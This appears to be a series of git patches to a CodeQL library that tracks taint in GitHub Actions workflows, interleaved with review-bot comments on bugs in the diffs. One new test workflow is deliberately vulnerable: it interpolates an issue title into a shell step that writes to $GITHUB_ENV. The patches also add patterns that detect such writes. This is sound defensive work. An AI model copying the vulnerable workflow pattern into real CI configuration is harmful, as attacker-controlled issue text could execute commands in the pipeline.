@@ -272,13 +316,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } - string getScript() { result = scriptExpr.getValue() } } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6e02e4036ba3..b19fbcbaca6d 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,8 +3,8 @@ import codeql.actions.DataFlow import actions /** Holds if a source model exists for the given parameters. */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string trigger, string kind) { + Extensions::sourceModel(action, version, output, trigger, kind) } /** Holds if a sink model exists for the given parameters. */ 
@@ -17,15 +17,27 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } +/** + * MaD sinks + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: sink node (prefixed with either `env.` or `input.`) + * - kind: sink kind + */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | - uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + ( + if input.trim().matches("env.%") + then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("input\\.", "")) + else sink.asExpr() = uses.getArgumentExpr(input.trim()) + ) and sinkModel(action, version, input, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() ) ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3bde829321fe..120444863e55 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
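Review bot: In `sinkNode`, the `env.` branch strips the wrong qualifier: `uses.getEnvExpr(input.trim().replaceAll("input\\.", ""))` passes `env.NAME` through unchanged, so a sink row written as `env.FOO` never matches an env definition and the sink is silently dropped — a false negative for exactly the injection pattern the model is meant to flag. The `else` branch does not strip the `input.` qualifier the header comment documents either, so `input.foo` rows fail as well; `externallyDefinedSummary` in FlowSteps.qll gets both right, and the same lines should be used here: `then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", ""))` / `else sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", ""))`. A shared helper for the qualifier handling would stop the three MaD predicates from drifting again.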
@@ -125,19 +125,36 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ private class ExternallyDefinedSource extends RemoteFlowSource { string soutceType; ExternallyDefinedSource() { - exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | - sourceModel(action, version, _, kind) and + exists( + UsesExpr uses, string action, string version, string output, string trigger, string kind + | + sourceModel(action, version, output, trigger, kind) and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if output.trim().matches("env.%") + then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) + else + // 'output.' is the default qualifier + // TODO: Taint just the specified output + this.asExpr() = uses ) and - uses = this.asExpr() and soutceType = kind ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e5fa04427ccf..95566aee96cc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
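Review bot: `ExternallyDefinedSource` has the same qualifier bug as `sinkNode` in ExternalFlow.qll: the `env.` branch calls `replaceAll("output\\.", "")`, which leaves `env.FOO` intact, so an `env.`-qualified source row never yields a source node; it should be `replaceAll("env\\.", "")`. The new `trigger` column is bound but never compared against anything, so a model declared for a specific event taints every workflow regardless of its `on:` block, contradicting the field description in the header comment; either constrain it against the enclosing workflow's triggers (`Actions::Workflow.getOn()` looks like the place to start) or document that only `*` is currently honoured.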
@@ -21,16 +21,32 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr uses, string action, string version, string input | - /*, string output */ summaryModel(action, version, input, _, "taint") and + // `output` not used yet + summaryModel(action, version, input, _, "taint") and uses.getCallee() = action and ( if version.trim() = "*" then uses.getVersion() = any(string v) - else uses.getVersion() = version.splitAt(",").trim() + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) ) and - pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and succ.asExpr() = uses ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de02616..93ec64b059e5 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,7 +5,9 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string trigger, string kind +); /** * Holds if a summary model exists for the given parameters. 
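Review bot: The header comment added to `externallyDefinedSummary` documents `kind` as `Either 'Taint' or 'Value'`, but the predicate matches the literal lowercase `"taint"` and the model rows added in this commit use `"taint"`, so a row written as documented would silently never match. Make the comment say `Either 'taint' or 'value'` (or lowercase the column before comparing), and state that `value` is not handled yet, in the same way the `output` column is already flagged as unused.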
diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml new file mode 100644 index 000000000000..b21aa207bb25 --- /dev/null +++ b/ql/lib/ext/REMOVEME.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert-replace-string-action.model.yml new file mode 100644 index 000000000000..e211fe2b69c7 --- /dev/null +++ b/ql/lib/ext/frabert-replace-string-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml new file mode 100644 index 000000000000..28517f445682 --- /dev/null +++ b/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] + - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] + - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml deleted file mode 100644 index e28ec39d1bee..000000000000 --- a/ql/lib/ext/sinks.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ - "FAKE-mad9000/actions-find-and-replace-string", - "*", - "source", - "expression-injection", - ] 
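Review bot: `REMOVEME.model.yml` ships a `sinkModel` row for a non-existent action, `FAKE-mad9000/actions-find-and-replace-string`, inside the `codeql/actions-all` extension pack, so every consumer of the pack loads a sink that can never match anything real. If it exists to exercise the sink plumbing it belongs under a test directory, and the file name itself says it should not be committed; at minimum a comment line explaining why it is there would help the next reader.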
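Review bot: `mad9000-actions-find-and-replace-string.model.yml` repeats the two `frabert/replace-string-action` rows that `frabert-replace-string-action.model.yml` defines in the same commit, so the frabert summary is declared twice and the per-action file naming this commit introduces is already broken. Drop the last two rows here. Note that splitting the old `"source, replace"` cell into separate rows is what makes the new `.trim()`-only matching work, so none of the new files may reuse the comma-separated form the deleted files used.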
diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml deleted file mode 100644 index 666a5532865e..000000000000 --- a/ql/lib/ext/sources.model.yml +++ /dev/null @@ -1,11 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ - "tj-actions/changed-files", - "v10, v20, v30, v40", - "all_changed_file", - "PR", - ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml deleted file mode 100644 index cc8e2df5fe9e..000000000000 --- a/ql/lib/ext/summaries.model.yml +++ /dev/null @@ -1,19 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: summaryModel - data: - - [ - "mad9000/actions-find-and-replace-string", - "*", - "source, replace", - "value", - "taint", - ] - - [ - "frabert/replace-string-action", - "*", - "string, replace-with", - "replaced", - "taint", - ] diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml new file mode 100644 index 000000000000..a3f687a0611c --- /dev/null +++ b/ql/lib/ext/tj-actions-changed-files.model.yml 
@@ -0,0 +1,28 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*",
"unmerged_files", "*", "PR changed files" ] From 4b57cee300fba6fa9a7268a9a88a4fe402a75f03 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:12:36 +0100 Subject: [PATCH 020/707] Initial implementaion of env context support --- ql/lib/codeql/actions/Ast.qll | 48 ++++++++------ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 5 +- .../dataflow/internal/DataFlowPrivate.qll | 63 +++++++++++-------- .../.github/workflows/argus_case_study.yml | 29 +++++++++ 4 files changed, 100 insertions(+), 45 deletions(-) create mode 100644 ql/src/test/.github/workflows/argus_case_study.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 697f28b54a2f..ec05fa309d34 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -330,11 +330,14 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJobStmt() { result.getAChildNode*() = this } + + abstract Expression getRefExpr(); } /** - * A ExprAccessExpr where the expression evaluated is a step output read. - * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + * Holds for an ExprAccessExpr accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { string stepId; 
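Review bot: Every `tj-actions/changed-files` row models the output as a `PR changed files` source for any version and any trigger, whereas the `sources.model.yml` this commit deletes restricted it to `v10, v20, v30, v40` and `PR`; since `trigger` is not enforced yet the `*` is harmless today, but the version widening is a deliberate precision loss that deserves a sentence in the commit message. Several of the listed outputs (`any_changed`, `any_deleted`, `any_modified`, `only_changed`, `only_deleted`, `only_modified`) appear to be boolean flags rather than file-name lists, so treating them as attacker-controlled strings is likely to produce false positives — confirm against the action's documented outputs before keeping those rows.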
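Review bot: The doc comment rewritten on `StepOutputAccessExpr` in this hunk, and the ones in the following hunks of Ast.qll (`JobOutputAccessExpr`, `ReusableWorkflowInputAccessExpr`, `EnvAccessExpr`) and DataFlowPrivate.qll (the four `*CtxLocalStep` predicates), all spell `accesing`; it should be `accessing`. `Holds for an ExprAccessExpr …` is also predicate phrasing on a class; `An ExprAccessExpr accessing the `steps` context.` reads better and matches the surrounding class docs.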
@@ -347,17 +350,16 @@ class StepOutputAccessExpr extends ExprAccessExpr { this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) } - string getStepId() { result = stepId } - - string getVarName() { result = varName } - - StepStmt getStepStmt() { result.getId() = stepId } + override Expression getRefExpr() { + this.getJobStmt() = result.(StepStmt).getJobStmt() and + result.(StepStmt).getId() = stepId + } } /** - * A ExprAccessExpr where the expression evaluated is a job output read. - * eg: `${{ needs.job1.outputs.foo}}` - * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) + * Holds for an ExprAccessExpr accesing the `needs` or `job` contexts. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` or `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; @@ -372,9 +374,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } - string getVarName() { result = varName } - - Expression getOutputExpr() { + override Expression getRefExpr() { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -391,8 +391,9 @@ class JobOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. - * eg: `${{ inputs.foo}}` + * Holds for an ExprAccessExpr accesing the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` */ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { string paramName; 
@@ -401,12 +402,23 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } - string getParamName() { result = paramName } - - Expression getInputExpr() { + override Expression getRefExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) } } + +/** + * Holds for an ExprAccessExpr accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ env.foo }}` + */ +class EnvAccessExpr extends ExprAccessExpr { + string varName; + + EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } + + override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 95566aee96cc..cafd60832760 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -81,7 +81,10 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and - line.regexpMatch(".*::set-output\\s+name.*") and + ( + line.regexpMatch(".*::set-output\\s+name.*") or + line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 76495e3f80ca..ee59e25ab20a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
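Review bot: `EnvAccessExpr.getRefExpr` resolves `${{ env.NAME }}` to the `NAME` definition of any `RunExpr` in the whole database, with no relation to the step, job, workflow or even file that contains the access, so an `env.FOO` read in one workflow gets a local flow step from every `FOO:` definition in every other workflow. Scope the lookup to the enclosing step or job, for example `exists(RunExpr s | s.getAChildNode*() = this and s.getEnvExpr(varName) = result)`, the way `StepOutputAccessExpr.getRefExpr` in the previous hunk constrains by job. The expanded version in the next commit (`@@ -420,5 +438,11 @@`) adds `JobUsesExpr` and `StepUsesExpr` branches but has the same missing scope.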
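Review bot: The added pattern `.*>>\\s*$GITHUB_ENV.*` can never match: in the regex the unescaped `$` is an end-of-input anchor, so `$GITHUB_ENV` demands a `G` after the end of the line, and the new `>> $GITHUB_ENV` detection is dead. Escape it, `line.regexpMatch(".*>>\\s*\\$GITHUB_ENV.*")`, and consider covering `$GITHUB_OUTPUT` the same way, since it is the replacement for the `::set-output` form the first alternative looks for. `runEnvToScriptstep` starts outside the hunk.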
@@ -164,41 +164,52 @@ class ArgumentPosition extends string { */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() +/** + * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * e.g. ${{ steps.step1.output.foo }} + */ +predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(StepStmt astFrom, StepOutputAccessExpr astTo | + (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } -predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(RunExpr uses, StepOutputAccessExpr outputRead | - uses = nodeFrom.asExpr() and - outputRead = nodeTo.asExpr() and - outputRead.getStepId() = uses.getId() and - uses.getJobStmt() = outputRead.getJobStmt() +/** + * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself + * e.g. 
${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + */ +predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, JobOutputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom ) } -predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression - exists(Expression astFrom, JobOutputAccessExpr astTo | +/** + * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * e.g. ${{ inputs.foo }} + */ +predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getOutputExpr() = astFrom + astTo.getRefExpr() = astFrom ) } -predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { - // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression - exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | +/** + * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself + * e.g. ${{ env.foo }} + */ +predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, EnvAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getInputExpr() = astFrom + astTo.getRefExpr() = astFrom ) } 
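Review bot: The doc examples on the new `*CtxLocalStep` predicates do not match the syntax the access classes parse: `steps.step1.output.foo` and `needs.job1.output.foo` should say `outputs`, and `job.job1.output.foo` should be `jobs.job1.outputs.foo` (the regexes in Ast.qll capture `outputs` and `(needs|jobs)`). `stepsCtxLocalStep` also documents the target as "the step output itself" although `getRefExpr` resolves to the whole `StepStmt`, not a specific output; `the step that defines it` would be accurate.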
@@ -209,10 +220,10 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) + stepsCtxLocalStep(nodeFrom, nodeTo) or + jobsCtxLocalStep(nodeFrom, nodeTo) or + inputsCtxLocalStep(nodeFrom, nodeTo) or + envCtxLocalStep(nodeFrom, nodeTo) } /** diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/src/test/.github/workflows/argus_case_study.yml new file mode 100644 index 000000000000..7b9c57354882 --- /dev/null +++ b/ql/src/test/.github/workflows/argus_case_study.yml @@ -0,0 +1,29 @@ +name: Issue Workflow + +on: + issues: + types: [opened, edited] + +jobs: + redirectIssue: + runs-on: ubuntu-latest + name: Check for issue transfer + env: + content_analysis_response: undefined + steps: + - uses: actions/checkout@v2 + - name: Remove conflicting chars + env: + ISSUE_TITLE: ${{github.event.issue.title}} + uses: frabert/replace-string-action@1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: "-" + - name: Check info + id: check-info + run: | + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + + From 99358c62e2e1a252a9e38dfdab8d51bb3d43a499 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 15:47:27 +0100 Subject: [PATCH 021/707] Extend CFG to reach env expressions --- ql/lib/codeql/actions/Ast.qll | 68 +++++++++++++------ .../actions/controlflow/internal/Cfg.qll | 6 +- ql/lib/test/test.ql | 14 +--- 3 files changed, 53 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ec05fa309d34..61f2d8e91d76 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -184,26 +184,6 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -238,7 +218,25 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) } - override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + override Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** 
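Review bot: The `getEnvExpr` body moved into `StepUsesExpr` here is byte-identical to `JobUsesExpr.getEnvExpr` and to the copy added to `RunExpr` in the next hunk (`@@ -317,6 +315,26 @@`), so three places now encode the step/job/workflow env lookup and any fix to precedence or scoping has to be made three times. Extract one module-level predicate, e.g. `Expression stepScopedEnv(StepStmt step, string name)`, and have the three members delegate to it. The `StepUsesExpr` class starts outside the hunk.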
@@ -317,6 +315,26 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -420,5 +438,11 @@ class EnvAccessExpr extends ExprAccessExpr { EnvAccessExpr() { varName = this.getExpression().regexpCapture("env\\.([A-Za-z0-9_-]+)", 1) } - override Expression getRefExpr() { exists(RunExpr s | s.getEnvExpr(varName) = result) } + override Expression getRefExpr() { + exists(JobUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(StepUsesExpr s | s.getEnvExpr(varName) = result) + or + exists(RunExpr s | s.getEnvExpr(varName) = result) + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 9129ee5dc617..0dd34ff926f8 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -227,7 +227,8 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by 
@@ -240,7 +241,8 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgumentExpr(_) and l = child.getLocation() + (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and + l = child.getLocation() | child order by diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index fe76852fa537..36c268ecc99d 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -31,10 +31,6 @@ query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNod query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } -query predicate outputAccesses(StepOutputAccessExpr va, string id, string var) { - id = va.getStepId() and var = va.getVarName() -} - query predicate orphanVarAccesses(ExprAccessExpr va, string var) { var = va.getExpression() and not exists(AstNode n | n = va.getParentNode()) 
